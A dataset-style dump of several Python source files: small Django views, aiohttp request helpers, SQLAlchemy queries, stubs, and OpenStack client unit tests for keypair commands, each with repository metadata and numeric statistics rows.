bb9c9a0234386b52f870b18b2654ae25bdc8eed1
|
[
"Unlicense"
] | null | null | null |
app/views.py
|
TheMoonWalker1/TJStar
|
bb9c9a0234386b52f870b18b2654ae25bdc8eed1
|
[
"Unlicense"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def home(request):
    """Render the landing page."""
    template_name = 'index.html'
    return render(request, template_name)
def speaker(request):
    """Render the speaker page."""
    template_name = 'speaker.html'
    return render(request, template_name)
def contact(request):
    """Render the contact page."""
    template_name = 'contact.html'
    return render(request, template_name)
def event(request):
    """Render the event page."""
    template_name = 'event.html'
    return render(request, template_name)
| 18.764706
| 42
| 0.717868
| 41
| 319
| 5.585366
| 0.439024
| 0.227074
| 0.331878
| 0.454148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159875
| 319
| 17
| 43
| 18.764706
| 0.854478
| 0.0721
| 0
| 0
| 0
| 0
| 0.149153
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0.111111
| 0.444444
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
6229fafe21751af4c8163c4d7d00cb7eae0dcf24
| 1,153
|
py
|
Python
|
utils/net.py
|
DiNitride/gafbot
|
fdf0b8c89f3ac0b23681ce656ca08a3e8f26071d
|
[
"MIT"
] | 51
|
2016-10-05T18:05:17.000Z
|
2017-10-01T10:41:43.000Z
|
utils/net.py
|
DiNitride/gafbot
|
fdf0b8c89f3ac0b23681ce656ca08a3e8f26071d
|
[
"MIT"
] | 6
|
2017-05-19T22:32:39.000Z
|
2018-10-14T18:12:12.000Z
|
utils/net.py
|
DiNitride/gafbot
|
fdf0b8c89f3ac0b23681ce656ca08a3e8f26071d
|
[
"MIT"
] | 9
|
2016-10-08T07:11:47.000Z
|
2019-11-04T03:30:24.000Z
|
import aiohttp
# Working aiohttp get_url
# Now with closing sessions!
# Ty Rory
async def get_url(url, headers: dict = None):
    """GET *url* and return a (response, payload, status) triple.

    The payload is the decoded JSON body for 200 responses (None when
    decoding fails) and None for any non-200 status.
    """
    request_headers = headers or {"user-agent": "GAF Bot"}
    async with aiohttp.ClientSession() as session:
        async with session.get(url, headers=request_headers) as response:
            status = response.status
            payload = None  # local renamed from `json`, which shadowed the stdlib module name
            if status == 200:
                try:
                    payload = await response.json()
                except Exception:
                    payload = None
            return response, payload, status
async def post_url(url, data: dict = None, headers: dict = None):
    """POST *data* to *url* and return a (response, payload, status) triple.

    Mirrors get_url: JSON is only decoded for 200 responses, with None on
    any decode failure or non-200 status.
    """
    request_headers = headers or {"user-agent": "GAF Bot"}
    async with aiohttp.ClientSession() as session:
        async with session.post(url, data=data, headers=request_headers) as response:
            status = response.status
            payload = None  # local renamed from `json`, which shadowed the stdlib module name
            if status == 200:
                try:
                    payload = await response.json()
                except Exception:
                    payload = None
            return response, payload, status
| 31.162162
| 77
| 0.562012
| 127
| 1,153
| 5.07874
| 0.283465
| 0.111628
| 0.086822
| 0.136434
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0
| 0.008097
| 0.357329
| 1,153
| 36
| 78
| 32.027778
| 0.862348
| 0.050304
| 0
| 0.814815
| 0
| 0
| 0.031193
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
625c4d51d2d396a4288002807afc375a0d4f106a
| 289
|
py
|
Python
|
app/database/company.py
|
hngyb/Finance-QA
|
1cf41a19e963a2566c7f6ee637e6a87b498032bb
|
[
"MIT"
] | 6
|
2021-08-02T10:56:16.000Z
|
2021-12-26T09:10:03.000Z
|
app/database/company.py
|
hngyb/Finance-QA
|
1cf41a19e963a2566c7f6ee637e6a87b498032bb
|
[
"MIT"
] | null | null | null |
app/database/company.py
|
hngyb/Finance-QA
|
1cf41a19e963a2566c7f6ee637e6a87b498032bb
|
[
"MIT"
] | 6
|
2021-06-26T17:05:12.000Z
|
2021-08-25T06:37:52.000Z
|
from sqlalchemy.orm import Session
import app.database.schema as models
def get_all_companies(db: Session):
    """Return every Company row in the database."""
    query = db.query(models.Company)
    return query.all()
def get_company_code(db: Session, name):
    """Return the stock codes of companies whose name equals *name* exactly."""
    query = db.query(models.Company.stock_code)
    matches = query.filter(models.Company.company_name == name)
    return matches.all()
| 36.125
| 96
| 0.778547
| 44
| 289
| 4.977273
| 0.5
| 0.178082
| 0.118721
| 0.173516
| 0.237443
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103806
| 289
| 8
| 96
| 36.125
| 0.84556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
62824852bdd44d724eb95fc4cf6c741e79fbd8ea
| 24
|
py
|
Python
|
slickml/optimization.py
|
amirhessam88/slick-ml
|
d8ffb46eeb7acc3f6e3a4b6ca80acfaaecb20b44
|
[
"MIT"
] | null | null | null |
slickml/optimization.py
|
amirhessam88/slick-ml
|
d8ffb46eeb7acc3f6e3a4b6ca80acfaaecb20b44
|
[
"MIT"
] | 1
|
2020-08-31T02:19:21.000Z
|
2020-08-31T02:19:21.000Z
|
slickml/optimization.py
|
amirhessam88/slick-ml
|
d8ffb46eeb7acc3f6e3a4b6ca80acfaaecb20b44
|
[
"MIT"
] | 1
|
2020-08-31T02:20:55.000Z
|
2020-08-31T02:20:55.000Z
|
# TODO: optimization.py
| 12
| 23
| 0.75
| 3
| 24
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.857143
| 0.875
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 1
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
65b59093dc69c1ca25ad2c6c640bda5c5e1b8925
| 31
|
py
|
Python
|
python/testData/refactoring/changeSignature/duplicateNamesOfStarredParameters.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/changeSignature/duplicateNamesOfStarredParameters.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/refactoring/changeSignature/duplicateNamesOfStarredParameters.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def func(*foo, **bar):
    # Intentionally empty. NOTE(review): the surrounding metadata path
    # ("testData/refactoring/changeSignature/duplicateNamesOfStarredParameters")
    # suggests this is an IDE refactoring fixture whose exact signature is the
    # point of the test — confirm before changing anything here.
    pass
| 15.5
| 22
| 0.548387
| 5
| 31
| 3.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225806
| 31
| 2
| 23
| 15.5
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
65d9396aee1e56ad579a8617e2e2d7497c781d9a
| 25,223
|
py
|
Python
|
openstackclient/tests/unit/compute/v2/test_keypair.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 262
|
2015-01-29T20:10:49.000Z
|
2022-03-23T01:59:23.000Z
|
openstackclient/tests/unit/compute/v2/test_keypair.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 5
|
2015-01-21T02:37:35.000Z
|
2021-11-23T02:26:00.000Z
|
openstackclient/tests/unit/compute/v2/test_keypair.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 194
|
2015-01-08T07:39:27.000Z
|
2022-03-30T13:51:23.000Z
|
# Copyright 2016 IBM
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from unittest import mock
from unittest.mock import call
import uuid
from novaclient import api_versions
from openstack import utils as sdk_utils
from osc_lib import exceptions
from openstackclient.compute.v2 import keypair
from openstackclient.tests.unit.compute.v2 import fakes as compute_fakes
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit.identity.v2_0 import fakes as identity_fakes
from openstackclient.tests.unit import utils as tests_utils
class TestKeypair(compute_fakes.TestComputev2):
    """Shared fixture base for keypair command tests.

    Wires a mocked identity ``users`` manager and replaces the SDK compute
    connection with a plain Mock so subclasses can program per-call return
    values on ``self.sdk_client`` without touching a real API.
    """

    def setUp(self):
        super(TestKeypair, self).setUp()
        # Initialize the user mock
        self.users_mock = self.app.client_manager.identity.users
        self.users_mock.reset_mock()
        self.users_mock.get.return_value = fakes.FakeResource(
            None,
            copy.deepcopy(identity_fakes.USER),
            loaded=True,
        )
        # Replace the whole SDK connection; individual keypair entry points
        # are Mocks so tests can set return_value / side_effect directly.
        self.app.client_manager.sdk_connection = mock.Mock()
        self.app.client_manager.sdk_connection.compute = mock.Mock()
        self.sdk_client = self.app.client_manager.sdk_connection.compute
        self.sdk_client.keypairs = mock.Mock()
        self.sdk_client.create_keypair = mock.Mock()
        self.sdk_client.delete_keypair = mock.Mock()
        self.sdk_client.find_keypair = mock.Mock()
class TestKeypairCreate(TestKeypair):
    """Tests for the ``keypair create`` command."""

    keypair = compute_fakes.FakeKeypair.create_one_keypair()

    def setUp(self):
        super(TestKeypairCreate, self).setUp()
        # Expected display columns/data for a keypair without a private key.
        self.columns = (
            'fingerprint',
            'name',
            'type',
            'user_id'
        )
        self.data = (
            self.keypair.fingerprint,
            self.keypair.name,
            self.keypair.type,
            self.keypair.user_id
        )
        # Get the command object to test
        self.cmd = keypair.CreateKeypair(self.app, None)
        self.sdk_client.create_keypair.return_value = self.keypair

    def test_key_pair_create_no_options(self):
        """Bare create: server generates the key, nothing is displayed."""
        arglist = [
            self.keypair.name,
        ]
        verifylist = [
            ('name', self.keypair.name),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        self.sdk_client.create_keypair.assert_called_with(
            name=self.keypair.name
        )
        self.assertEqual({}, columns)
        self.assertEqual({}, data)

    def test_keypair_create_public_key(self):
        """Importing a public key shows the keypair details."""
        # overwrite the setup one because we want to omit private_key
        self.keypair = compute_fakes.FakeKeypair.create_one_keypair(
            no_pri=True)
        self.sdk_client.create_keypair.return_value = self.keypair
        self.data = (
            self.keypair.fingerprint,
            self.keypair.name,
            self.keypair.type,
            self.keypair.user_id
        )
        arglist = [
            '--public-key', self.keypair.public_key,
            self.keypair.name,
        ]
        verifylist = [
            ('public_key', self.keypair.public_key),
            ('name', self.keypair.name),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        # The command reads the public-key file via io.open; stub it out.
        with mock.patch('io.open') as mock_open:
            mock_open.return_value = mock.MagicMock()
            m_file = mock_open.return_value.__enter__.return_value
            m_file.read.return_value = 'dummy'
            columns, data = self.cmd.take_action(parsed_args)
        self.sdk_client.create_keypair.assert_called_with(
            name=self.keypair.name,
            public_key=self.keypair.public_key,
        )
        self.assertEqual(self.columns, columns)
        self.assertEqual(self.data, data)

    def test_keypair_create_private_key(self):
        """The generated private key must be written to the requested file."""
        tmp_pk_file = '/tmp/kp-file-' + uuid.uuid4().hex
        arglist = [
            '--private-key', tmp_pk_file,
            self.keypair.name,
        ]
        verifylist = [
            ('private_key', tmp_pk_file),
            ('name', self.keypair.name),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        with mock.patch('io.open') as mock_open:
            mock_open.return_value = mock.MagicMock()
            m_file = mock_open.return_value.__enter__.return_value
            columns, data = self.cmd.take_action(parsed_args)
        self.sdk_client.create_keypair.assert_called_with(
            name=self.keypair.name,
        )
        mock_open.assert_called_once_with(tmp_pk_file, 'w+')
        m_file.write.assert_called_once_with(self.keypair.private_key)
        self.assertEqual(self.columns, columns)
        self.assertEqual(self.data, data)

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
    def test_keypair_create_with_key_type(self, sm_mock):
        """--type is forwarded when the microversion supports it."""
        for key_type in ['x509', 'ssh']:
            self.keypair = compute_fakes.FakeKeypair.create_one_keypair(
                no_pri=True)
            self.sdk_client.create_keypair.return_value = self.keypair
            self.data = (
                self.keypair.fingerprint,
                self.keypair.name,
                self.keypair.type,
                self.keypair.user_id,
            )
            arglist = [
                '--public-key', self.keypair.public_key,
                self.keypair.name,
                '--type', key_type,
            ]
            verifylist = [
                ('public_key', self.keypair.public_key),
                ('name', self.keypair.name),
                ('type', key_type),
            ]
            parsed_args = self.check_parser(self.cmd, arglist, verifylist)
            with mock.patch('io.open') as mock_open:
                mock_open.return_value = mock.MagicMock()
                m_file = mock_open.return_value.__enter__.return_value
                m_file.read.return_value = 'dummy'
                columns, data = self.cmd.take_action(parsed_args)
            self.sdk_client.create_keypair.assert_called_with(
                name=self.keypair.name,
                public_key=self.keypair.public_key,
                key_type=key_type,
            )
            self.assertEqual(self.columns, columns)
            self.assertEqual(self.data, data)

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
    def test_keypair_create_with_key_type_pre_v22(self, sm_mock):
        """--type must be rejected before microversion 2.2."""
        for key_type in ['x509', 'ssh']:
            # BUG FIX: the original hard-coded '--type', 'ssh' here, so the
            # 'x509' loop iteration was a duplicate and never exercised its
            # own key type. Use the loop variable in both lists.
            arglist = [
                '--public-key', self.keypair.public_key,
                self.keypair.name,
                '--type', key_type,
            ]
            verifylist = [
                ('public_key', self.keypair.public_key),
                ('name', self.keypair.name),
                ('type', key_type),
            ]
            parsed_args = self.check_parser(self.cmd, arglist, verifylist)
            with mock.patch('io.open') as mock_open:
                mock_open.return_value = mock.MagicMock()
                m_file = mock_open.return_value.__enter__.return_value
                m_file.read.return_value = 'dummy'
                ex = self.assertRaises(
                    exceptions.CommandError,
                    self.cmd.take_action,
                    parsed_args)
                self.assertIn(
                    '--os-compute-api-version 2.2 or greater is required',
                    str(ex))

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
    def test_key_pair_create_with_user(self, sm_mock):
        """--user resolves to a user_id and is forwarded."""
        arglist = [
            '--user', identity_fakes.user_name,
            self.keypair.name,
        ]
        verifylist = [
            ('user', identity_fakes.user_name),
            ('name', self.keypair.name),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        self.sdk_client.create_keypair.assert_called_with(
            name=self.keypair.name,
            user_id=identity_fakes.user_id,
        )
        self.assertEqual({}, columns)
        self.assertEqual({}, data)

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
    def test_key_pair_create_with_user_pre_v210(self, sm_mock):
        """--user must be rejected before microversion 2.10."""
        arglist = [
            '--user', identity_fakes.user_name,
            self.keypair.name,
        ]
        verifylist = [
            ('user', identity_fakes.user_name),
            ('name', self.keypair.name),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ex = self.assertRaises(
            exceptions.CommandError,
            self.cmd.take_action,
            parsed_args)
        self.assertIn(
            '--os-compute-api-version 2.10 or greater is required', str(ex))
class TestKeypairDelete(TestKeypair):
    """Tests for the ``keypair delete`` command."""

    keypairs = compute_fakes.FakeKeypair.create_keypairs(count=2)

    def setUp(self):
        super(TestKeypairDelete, self).setUp()
        self.cmd = keypair.DeleteKeypair(self.app, None)

    def test_keypair_delete(self):
        # Single deletion: returns None and calls the SDK once.
        arglist = [
            self.keypairs[0].name
        ]
        verifylist = [
            ('name', [self.keypairs[0].name]),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ret = self.cmd.take_action(parsed_args)
        self.assertIsNone(ret)
        self.sdk_client.delete_keypair.assert_called_with(
            self.keypairs[0].name, ignore_missing=False)

    def test_delete_multiple_keypairs(self):
        # Every named keypair gets its own delete call, in order.
        arglist = []
        for k in self.keypairs:
            arglist.append(k.name)
        verifylist = [
            ('name', arglist),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        result = self.cmd.take_action(parsed_args)
        calls = []
        for k in self.keypairs:
            calls.append(call(k.name, ignore_missing=False))
        self.sdk_client.delete_keypair.assert_has_calls(calls)
        self.assertIsNone(result)

    def test_delete_multiple_keypairs_with_exception(self):
        # One failing delete out of two surfaces as "1 of 2 keys failed",
        # and both deletes are still attempted.
        arglist = [
            self.keypairs[0].name,
            'unexist_keypair',
        ]
        verifylist = [
            ('name', arglist),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.sdk_client.delete_keypair.side_effect = [
            None, exceptions.CommandError]
        try:
            self.cmd.take_action(parsed_args)
            self.fail('CommandError should be raised.')
        except exceptions.CommandError as e:
            self.assertEqual('1 of 2 keys failed to delete.', str(e))
        calls = []
        for k in arglist:
            calls.append(call(k, ignore_missing=False))
        self.sdk_client.delete_keypair.assert_has_calls(calls)

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
    def test_keypair_delete_with_user(self, sm_mock):
        # --user is forwarded as user_id when the microversion allows it.
        arglist = [
            '--user', identity_fakes.user_name,
            self.keypairs[0].name
        ]
        verifylist = [
            ('user', identity_fakes.user_name),
            ('name', [self.keypairs[0].name]),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ret = self.cmd.take_action(parsed_args)
        self.assertIsNone(ret)
        self.sdk_client.delete_keypair.assert_called_with(
            self.keypairs[0].name,
            user_id=identity_fakes.user_id,
            ignore_missing=False
        )

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
    def test_keypair_delete_with_user_pre_v210(self, sm_mock):
        # --user must be rejected before microversion 2.10.
        self.app.client_manager.compute.api_version = \
            api_versions.APIVersion('2.9')
        arglist = [
            '--user', identity_fakes.user_name,
            self.keypairs[0].name
        ]
        verifylist = [
            ('user', identity_fakes.user_name),
            ('name', [self.keypairs[0].name]),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ex = self.assertRaises(
            exceptions.CommandError,
            self.cmd.take_action,
            parsed_args)
        self.assertIn(
            '--os-compute-api-version 2.10 or greater is required', str(ex))
class TestKeypairList(TestKeypair):
    """Tests for the ``keypair list`` command."""

    # Return value of self.sdk_client.keypairs().
    keypairs = compute_fakes.FakeKeypair.create_keypairs(count=1)

    def setUp(self):
        super(TestKeypairList, self).setUp()
        self.sdk_client.keypairs.return_value = self.keypairs
        # Get the command object to test
        self.cmd = keypair.ListKeypair(self.app, None)

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
    def test_keypair_list_no_options(self, sm_mock):
        # Pre-2.2 listing: no Type column.
        arglist = []
        verifylist = []
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        # In base command class Lister in cliff, abstract method take_action()
        # returns a tuple containing the column names and an iterable
        # containing the data to be listed.
        columns, data = self.cmd.take_action(parsed_args)
        # Set expected values
        self.sdk_client.keypairs.assert_called_with()
        self.assertEqual(('Name', 'Fingerprint'), columns)
        self.assertEqual(
            ((self.keypairs[0].name, self.keypairs[0].fingerprint), ),
            tuple(data)
        )

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
    def test_keypair_list_v22(self, sm_mock):
        # From 2.2 on, a Type column is included.
        arglist = []
        verifylist = []
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        # In base command class Lister in cliff, abstract method take_action()
        # returns a tuple containing the column names and an iterable
        # containing the data to be listed.
        columns, data = self.cmd.take_action(parsed_args)
        # Set expected values
        self.sdk_client.keypairs.assert_called_with()
        self.assertEqual(('Name', 'Fingerprint', 'Type'), columns)
        self.assertEqual(
            ((
                self.keypairs[0].name,
                self.keypairs[0].fingerprint,
                self.keypairs[0].type,
            ), ),
            tuple(data)
        )

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
    def test_keypair_list_with_user(self, sm_mock):
        # --user: resolve the name via identity, then list for that user_id.
        users_mock = self.app.client_manager.identity.users
        users_mock.reset_mock()
        users_mock.get.return_value = fakes.FakeResource(
            None,
            copy.deepcopy(identity_fakes.USER),
            loaded=True,
        )
        arglist = [
            '--user', identity_fakes.user_name,
        ]
        verifylist = [
            ('user', identity_fakes.user_name),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        users_mock.get.assert_called_with(identity_fakes.user_name)
        self.sdk_client.keypairs.assert_called_with(
            user_id=identity_fakes.user_id,
        )
        self.assertEqual(('Name', 'Fingerprint', 'Type'), columns)
        self.assertEqual(
            ((
                self.keypairs[0].name,
                self.keypairs[0].fingerprint,
                self.keypairs[0].type,
            ), ),
            tuple(data)
        )

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
    def test_keypair_list_with_user_pre_v210(self, sm_mock):
        # --user must be rejected before microversion 2.10.
        arglist = [
            '--user', identity_fakes.user_name,
        ]
        verifylist = [
            ('user', identity_fakes.user_name),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ex = self.assertRaises(
            exceptions.CommandError,
            self.cmd.take_action,
            parsed_args)
        self.assertIn(
            '--os-compute-api-version 2.10 or greater is required', str(ex))

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
    def test_keypair_list_with_project(self, sm_mock):
        # --project: resolve the project, list its users, then list keypairs
        # for the resolved user_id.
        projects_mock = self.app.client_manager.identity.tenants
        projects_mock.reset_mock()
        projects_mock.get.return_value = fakes.FakeResource(
            None,
            copy.deepcopy(identity_fakes.PROJECT),
            loaded=True,
        )
        users_mock = self.app.client_manager.identity.users
        users_mock.reset_mock()
        users_mock.list.return_value = [
            fakes.FakeResource(
                None,
                copy.deepcopy(identity_fakes.USER),
                loaded=True,
            ),
        ]
        arglist = ['--project', identity_fakes.project_name]
        verifylist = [('project', identity_fakes.project_name)]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        projects_mock.get.assert_called_with(identity_fakes.project_name)
        users_mock.list.assert_called_with(tenant_id=identity_fakes.project_id)
        self.sdk_client.keypairs.assert_called_with(
            user_id=identity_fakes.user_id,
        )
        self.assertEqual(('Name', 'Fingerprint', 'Type'), columns)
        self.assertEqual(
            ((
                self.keypairs[0].name,
                self.keypairs[0].fingerprint,
                self.keypairs[0].type,
            ), ),
            tuple(data)
        )

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
    def test_keypair_list_with_project_pre_v210(self, sm_mock):
        # --project must be rejected before microversion 2.10.
        arglist = ['--project', identity_fakes.project_name]
        verifylist = [('project', identity_fakes.project_name)]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ex = self.assertRaises(
            exceptions.CommandError,
            self.cmd.take_action,
            parsed_args)
        self.assertIn(
            '--os-compute-api-version 2.10 or greater is required', str(ex))

    def test_keypair_list_conflicting_user_options(self):
        # --user and --project are mutually exclusive at the parser level.
        arglist = [
            '--user', identity_fakes.user_name,
            '--project', identity_fakes.project_name,
        ]
        self.assertRaises(
            tests_utils.ParserException,
            self.check_parser, self.cmd, arglist, None)

    @mock.patch.object(
        sdk_utils, 'supports_microversion', new=mock.Mock(return_value=True))
    def test_keypair_list_with_limit(self):
        arglist = [
            '--limit', '1',
        ]
        verifylist = [
            ('limit', 1),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.sdk_client.keypairs.assert_called_with(limit=1)

    @mock.patch.object(
        sdk_utils, 'supports_microversion', new=mock.Mock(return_value=False))
    def test_keypair_list_with_limit_pre_v235(self):
        # --limit must be rejected before microversion 2.35.
        arglist = [
            '--limit', '1',
        ]
        verifylist = [
            ('limit', 1),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ex = self.assertRaises(
            exceptions.CommandError,
            self.cmd.take_action,
            parsed_args)
        self.assertIn(
            '--os-compute-api-version 2.35 or greater is required', str(ex))

    @mock.patch.object(
        sdk_utils, 'supports_microversion', new=mock.Mock(return_value=True))
    def test_keypair_list_with_marker(self):
        arglist = [
            '--marker', 'test_kp',
        ]
        verifylist = [
            ('marker', 'test_kp'),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        self.cmd.take_action(parsed_args)
        self.sdk_client.keypairs.assert_called_with(marker='test_kp')

    @mock.patch.object(
        sdk_utils, 'supports_microversion', new=mock.Mock(return_value=False))
    def test_keypair_list_with_marker_pre_v235(self):
        # --marker must be rejected before microversion 2.35.
        arglist = [
            '--marker', 'test_kp',
        ]
        verifylist = [
            ('marker', 'test_kp'),
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ex = self.assertRaises(
            exceptions.CommandError,
            self.cmd.take_action,
            parsed_args)
        self.assertIn(
            '--os-compute-api-version 2.35 or greater is required', str(ex))
class TestKeypairShow(TestKeypair):
    """Tests for the ``keypair show`` command."""

    keypair = compute_fakes.FakeKeypair.create_one_keypair()

    def setUp(self):
        super(TestKeypairShow, self).setUp()
        self.sdk_client.find_keypair.return_value = self.keypair
        self.cmd = keypair.ShowKeypair(self.app, None)
        # Expected display columns/data for a keypair without a private key.
        self.columns = (
            "fingerprint",
            "name",
            "type",
            "user_id"
        )
        self.data = (
            self.keypair.fingerprint,
            self.keypair.name,
            self.keypair.type,
            self.keypair.user_id
        )

    def test_keypair_show_no_options(self):
        arglist = []
        verifylist = []
        # Missing required args should boil here
        self.assertRaises(tests_utils.ParserException, self.check_parser,
                          self.cmd, arglist, verifylist)

    def test_keypair_show(self):
        # overwrite the setup one because we want to omit private_key
        self.keypair = compute_fakes.FakeKeypair.create_one_keypair(
            no_pri=True)
        self.sdk_client.find_keypair.return_value = self.keypair
        self.data = (
            self.keypair.fingerprint,
            self.keypair.name,
            self.keypair.type,
            self.keypair.user_id
        )
        arglist = [
            self.keypair.name
        ]
        verifylist = [
            ('name', self.keypair.name)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        self.sdk_client.find_keypair.assert_called_with(
            self.keypair.name,
            ignore_missing=False
        )
        self.assertEqual(self.columns, columns)
        self.assertEqual(self.data, data)

    def test_keypair_show_public(self):
        # --public-key prints only the key material, so no columns/data.
        arglist = [
            '--public-key',
            self.keypair.name
        ]
        verifylist = [
            ('public_key', True),
            ('name', self.keypair.name)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        self.assertEqual({}, columns)
        self.assertEqual({}, data)

    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
    def test_keypair_show_with_user(self, sm_mock):
        # overwrite the setup one because we want to omit private_key
        self.keypair = compute_fakes.FakeKeypair.create_one_keypair(
            no_pri=True)
        self.sdk_client.find_keypair.return_value = self.keypair
        self.data = (
            self.keypair.fingerprint,
            self.keypair.name,
            self.keypair.type,
            self.keypair.user_id
        )
        arglist = [
            '--user', identity_fakes.user_name,
            self.keypair.name,
        ]
        verifylist = [
            ('user', identity_fakes.user_name),
            ('name', self.keypair.name)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        columns, data = self.cmd.take_action(parsed_args)
        self.users_mock.get.assert_called_with(identity_fakes.user_name)
        self.sdk_client.find_keypair.assert_called_with(
            self.keypair.name,
            ignore_missing=False,
            user_id=identity_fakes.user_id
        )
        self.assertEqual(self.columns, columns)
        self.assertEqual(self.data, data)

